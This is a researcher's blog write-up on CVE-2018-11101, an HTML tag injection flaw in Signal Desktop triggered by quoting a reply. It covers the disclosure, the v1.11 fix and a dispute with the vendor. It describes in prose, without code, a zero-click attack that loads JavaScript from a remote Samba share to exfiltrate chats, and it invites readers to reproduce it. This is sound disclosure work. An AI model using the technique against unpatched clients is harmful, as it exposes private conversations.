signal-desktop HTML tag injection variant 2

This is a new story about how another casual conversation uncovered a huge security hole in one of the most reliable messaging services.

New story time for CVE-2018-11101

TL;DR: upgrade to signal-desktop v1.11+

After publishing the advisory and write-up for CVE-2018-10994, I was contacted on Twitter by Matt Bryant (@IAmMandatory), with whom I was having conversations since Alfredo showed the first PoC and told me: «I could still pop [the vuln] in the patched [version]» and advised me to try the following: write a message with HTML content and simply reply to it. Holly shit!

We immediately proceeded to contact again the Signal Security Team and they told us that they were aware of it and were already rolling out a new, refactored, release (v1.11.0), which solved this and the previous issue in a better way.

During my previous research, I also discovered that there was a missing CSP directive related to iframes that would have deter this attack, and I was thinking to do a PR but this came out so I recommended its implementation in the advisory we sent by email, and the Signal team applied right away.

Basically, the attack was the same except you needed two messages: the injection and the reply. The reply (quoted message) can have any text, as shown in the screenshot.

A new video

Exploiting this requires the attacker to first manually place malware (a malicious JavaScript file) on your computer or on a Samba network share that your computer is already connected to.

That claim make us look like we weren’t saying the truth, so I made a new video – thanks for making me work some more on my vacations – proving otherwise.

Thanks Javier for creating the public Samba share and making this video possible.

The video shows what we stated before: the victim, unable to do anything, gets pwned by the attacker with a payload in a remote Samba share (located in the USA, the victim being in Brasil). That payload exfiltrates all of the conversations the victim has had, defeating the purpose of having an encrypted chat. In short, it’s remote 0-click code execution through HTML tag injection pwning. To clarify, we never mentioned anything about System RCE, that is, being able to execute a remote shell or opening calc.exe. We did try that path but were unsuccessful and didn’t pursued any more. As I mentioned in the first write-up, we managed to produce segfaults in Alfredo’s machine, but couldn’t reproduce them in my machine. So it might be possible to get System RCE, though it requires further investigation.

I tweeted about the making of this video and before it was published, Josh publicly apologized and the team emailed us apologizing too, so as I answered them: apology accepted.

I would love to see someone else reproducing our findings :). It’s really easy, you just need a publicly accessible Samba share with the PoC file there and just execute the exploit as seen in the video.